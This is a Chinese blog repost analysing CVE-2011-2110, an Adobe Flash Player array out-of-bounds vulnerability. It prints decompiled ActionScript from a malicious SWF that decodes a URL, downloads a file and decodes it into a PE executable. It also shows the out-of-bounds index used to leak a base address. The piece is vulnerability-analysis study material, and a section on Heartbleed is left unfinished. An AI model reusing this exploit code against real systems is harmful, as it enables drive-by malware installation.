数组越界漏洞(参考<<漏洞战争>>)

最新推荐文章于 2024-04-16 15:39:06 发布
最新推荐文章于 2024-04-16 15:39:06 发布
阅读量456 收藏
点赞数
文章标签: rust c/c++
原文链接:http://www.cnblogs.com/freesec/p/6444537.html
版权

1.简介

通过访问,写入到超出最大索引的地方导致被利用

 

2.CVE-2011-2110-Adobe Flash Player 数组越界索引漏洞

(1).将swf文件反编译后提取出来分析

(2)分析源文件

main函数中:

var param:Object = root.loaderInfo.parameters;
//获取并解析参数
var t_url:ByteArray = this.hexToBin(param["info"]);
i = 0;
i = 0;
while(i < t_url.length)
{
t_url[i] = t_url[i] ^ 122;
i++;
}
t_url.uncompress();

......

//下载文件
loader = new URLLoader();
loader.dataFormat = URLLoaderDataFormat.BINARY;
loader.addEventListener(Event.COMPLETE,onLoadComplete);
loader.load(new URLRequest(t_url.toString()));

.......

 

onLoadComplete = function(param1:Event):void
{
content = loader.data;
i = 0;
//解析获取到的数据,完了后是个恶意程序
while(i < content.length)
{
content[i] = content[i] ^ 122;
i++;
}
content.uncompress();
content_len = content.length;
var _loc2_:ByteArray = new ByteArray();
code = _loc2_;
_loc2_.position = 1024 * 1024;
_loc2_.writeInt(2053274210);
_loc2_.writeInt(2053339747);
_loc2_.writeInt(2053405283);
_loc2_.writeObject(_loc2_);
//触发漏洞
test();
trace(_loc2_.length);
};

 

以上通过获取参数info, 解码后其实就是一个url. 然后通过该url下载一个文件,将文件中的内容解码后是个pe文件. 可以通过自己搭建环境测试

 

 

 (3)通过修改样本代码定位漏洞

对于浏览器漏洞,可以通过修改样本代码使其本来是稳定利用变的不稳定,以便分析

对于swf文件,可以反编译后修改关键值使ie加载后能发生异常并重新编译成swf文件, 以便分析

例如,本次实验的代码:

var _loc8_:uint = 0;
var _loc2_:Number = new Number(parseFloat(String(rest[1073741838]))); //1073741838=0x4000000E,进行越界索引, 将其修改为其他值直到能发生异常,书上修改的是0x41414141
var _loc3_:ByteArray = new ByteArray();
_loc3_.position = 0;
_loc3_.writeDouble(_loc2_);
var _loc4_:uint = _loc3_[0] * 16777216 + _loc3_[1] * 65536 + _loc3_[2] * 256 + _loc3_[3];//信息泄露构成基址地址
this.baseaddr = _loc4_;
this.code.position = 0;

这样再附加后就能很方便地分析了.

 

 

CVE-2014-0160-OpenSSL TLS 数组越界访问漏洞(“心脏出血”漏洞)

 

未完待续...............

转载于:https://www.cnblogs.com/freesec/p/6444537.html

weixin_30252155
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
substring数组越界_浏览器漏洞:从数组越界到任意地址读写
weixin_39884492的博客
12-22 752
引言在现代的操作系统中,针对内存破坏方面的漏洞,提供了一系列的阻碍措施,类似DEP、CFG以及EMET。浏览器Exploit中,通过UAF/Double Free 乃至 堆溢出都能实现对内存的一定程度读写,但是碍于内存不可执行,浏览器利用中常常需要精确堆喷射结合ROP,前提是获取二进制文件(ELF/COFF)在内存中load的确切地址(地址泄漏)。文本暂时不讨论堆利用本身,会分别讨论两个浏览器漏洞...
CTF数组越界漏洞内存布局简析
BadRer的博客
06-03 1805
今天为大家带来一篇关于数组越界漏洞原理的分析,并且结合CTF中的实例给大家讲解下。由于自己也是第一次接触,如若有不到位的地方,还希望各位评论补充我会及时的改正。总体来说数组越界其实和栈溢出差不多。。。 推荐一篇文章 http://blog.csdn.net/human_evolution/article/details/40752047 基本上把数组越界的原理给讲清楚了。在这里呢,我主要是结合
【软件与系统安全】整数溢出、格式化字符串、数组越界访问漏洞
kkzzjx
05-20 1387
文章目录一、整数溢出整数表示举例防护二、格式化字符串漏洞三、数组越界访问漏洞产生举例 一、整数溢出 整数表示 原码、反码、补码表示: 对于正数原码、反码以及补码是其本身。负数的原码是其本身,反码是对原码除符号位之外的各位取反,补码则是反码加1。 CF是无符号溢出标志,OF是有符号溢出标志。即使有符号数相加/相减导致了CF=1也没什么意义,不能说明结果的正确与否。此时,OF=1,则说明结果溢出,出现错误;OF=0,说明结果正确。这个过程根本和CF没关系,CF=1/0,都不会影响。 这说明指针类型不同,对
220828-RustC++越界访问处理对比
十年学会编程
08-28 657
做一下rust和cpp数组越界访问的对比,以此看看两种语言的差异。
从汇编代码理解数组越界访问漏洞
最新发布
阿航的博客
04-16 1485
根据上述示例可以发现,通过数组越界来覆盖函数的返回地址可以更改程序的执行流程。同样地,攻击者可以填写存放恶意代码的地址,从而引导函数func1去执行该恶意代码。因此,在编写代码中对数组做边界检查尤为重要。
漏洞基础知识
weixin_43977912的博客
03-23 1020
I.通用漏洞类型 1.栈溢出 栈溢出是缓冲区溢出的一种,往往由于对缓冲区的长度没有判断,导致缓冲区的大小超过了预定的大小,导致在栈内的保存的返回地址被覆盖,这时候返回地址将指向未知的位置.造成访问异常的错误. 而当我们精心构造一段shellcode保存在某个位置,并且通过滑板指令以及其他特定的方法跳转至shellcode的位置上执行shellcode,此时就可以通过shellcode获取到系统的管理员权限.执行任意代码, windows XP之前的系统可以直接利用,在windows7以后的系统需要构造ROP
C/C++ 避免数组越界的方法
08-19
在实际编程中,数组越界错误可能会导致一些严重的后果,例如,程序崩溃、数据损坏、安全漏洞等。因此,程序员需要小心地编写代码,以避免数组越界错误的发生。 在密码验证的示例代码中,我们可以看到,如果不进行...
mmm.rar_数组越界_越界
09-19
在编程领域,数组越界是常见的错误类型,尤其是在C++这样的低级语言中。这个问题涉及到对内存的理解和正确使用,是每位程序员都需要掌握的基本技能。本文将深入探讨数组越界的含义、原因及其解决方法,特别关注C++...
浅析C语言编程中的数组越界问题
09-03
数组越界可能导致数据损坏、程序崩溃,甚至安全漏洞。下面我们将深入探讨这个问题。 首先,我们来看两种类型的数组越界情况: 1. **堆中的数组越界**: 当在堆上动态分配数组时,程序员需要精确地管理内存。如果...
基于抽象语法树的数组越界的静态检测方法 (2006年)
05-22
针对数组访问越界这一类安全漏洞,以源程序的抽象语法树作为分析对象,提出了一种新的静态解决方案。该方案通过分析数组访问越界安全漏洞的表现,抽象出安全模式,然后根据安全模式以及遍历ast过程中记录的节点属性...
第7章 数组-9数组下标越界问题分析1
08-03
3. **安全漏洞**:在某些情况下,下标越界可能导致内存溢出,破坏程序堆栈,从而引发缓冲区溢出攻击,影响程序安全性。 4. **性能影响**:频繁的越界访问会增加程序的不确定性,降低运行效率,还可能触发系统异常...
数组越界引起的死循环
番茄炒土豆的博客
10-25 1754
闲话不多说,先上一段代码: int main(){ int i = 0; int arr[3] = {0}; for(;i&lt;=3;i++){ arr[i] = 0; printf("hello world\n"); } return 0; } 看到没,数组大小为3,arr[0],arr[1],arr[2],而我们的for循环结束条件错写为i&lt;=3,出现了arr[...
32位md5解密_了解常用加解密算法并简单逆向识别
weixin_39911056的博客
11-18 5035
本文为看雪论坛优秀文章看雪论坛作者ID:阿伪前言想作为分析勒索病毒前的密码学接触,有些太难的算法,弟弟属实吃力,就不献丑了,可能也存在未察觉的错误,希望各位帮忙提出来,避免误导他人,谢谢师傅们。常用加解密算法的逆向分析中的识别,不做过多算法原理上的叙述,别人讲的好多了,站在巨人的肩膀上。这篇文章只作为特征查找用来辅助平时分析用。两种工具ida插件FindCrypt2和peid的KA...
数组越界及其避免方法,C语言数组越界详解
热门推荐
李肖遥的专栏
11-24 1万+
关注、星标公众号,直达精彩内容ID:技术让梦想更伟大作者:李肖遥所谓的数组越界,简单地讲就是指数组下标变量的取值超过了初始定义时的大小,导致对数组元素的访问出现在数组的范围之外,这类错误...
PWN入门之数组越界
weixin_44681716的博客
05-04 2223
实验目的 利用数组越界的特性,去填充不能利用栈溢出的方法去覆盖的值。 通过这次实验,使我们掌握利用数组越界去继续泄露的方法。 实验文件 链接:https://pan.baidu.com/s/1tLyKYjdLXjLKjRHoivhYnQ 提取码:m6ra 我们主要通过2019年4月信息安全国赛的you_pwn来介绍一下怎么去利用数组越界。 实验步骤 首先介绍一下数组越界的原理: 数组越界分两种:一...
烦人的数组越界问题 解决攻略
半壁江山009的博客
11-01 1万+
一般 数组越界是比较难搞的。我的办法 一般 按照 下列 顺序 来找。我认为 越是 笨办法 越有效。 第一步,是聪明办法,就是直接 看代码 检查所有数组的下标,看看有没有错。万一运气很好就发现问题了。 后面 开始就是 笨办法了。 第二步 首先 把 整个 程序 分城相对独立的几段,段与段之间 搞个 输出 ,看 问题 出在那一段。逻辑就是,问题(出问题的 那个点)肯定出在 正常运行 的 输出 语句
Nginx CVE-2017-7529数组越界读取缓存漏洞
qq_43665434的博客
05-18 321
Nginx CVE-2017-7529数组越界读取缓存漏洞 漏洞原理:传送门 实验环境 主机 角色 IP centos8 漏洞靶机 192.168.1.80 windows10 攻击机 192.168.1.120 实验过程 启动漏洞靶机centos8 # 进入vulhub目录 cd /usr/sbin/vulhub/CVE-2017-7529/ # 开启docker服务 service docker start # 创建docker镜像 docker-compose build #
CVE-2017-0144 (Windows server 2008系列缓冲区溢出漏洞
Fly_鹏程万里
03-15 8539
漏洞原理srv.sys在处理SrvOs2FeaListSizeToNt的时候逻辑不正确导致越界拷贝。我们首先看下漏洞的触发点:unsigned int __fastcall SrvOs2FeaToNt(int a1, int a2) {   int v4; // edi@1   _BYTE *v5; // edi@1   unsigned int result; // eax@1   v4 = a...
*** stack smashing detected ***: <unknown> terminated是什么问题?
07-17
`*** stack smashing detected ***: <unknown> terminated` 是一个/C++ 程序运行时的错误信息。它表示在程序执行过程中发生了堆栈溢出(stack smashing),即向一个已经满了的缓冲区写入数据,导致覆盖了相邻内存区域的内容。这通常是由于数组越界、指针操作错误或者缓冲区溢出等问题引起的。堆栈溢出可能导致程序崩溃或安全漏洞。要解决这个问题,需要检查代码中的数组和指针操作,确保没有超出其边界或者尺寸限制。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值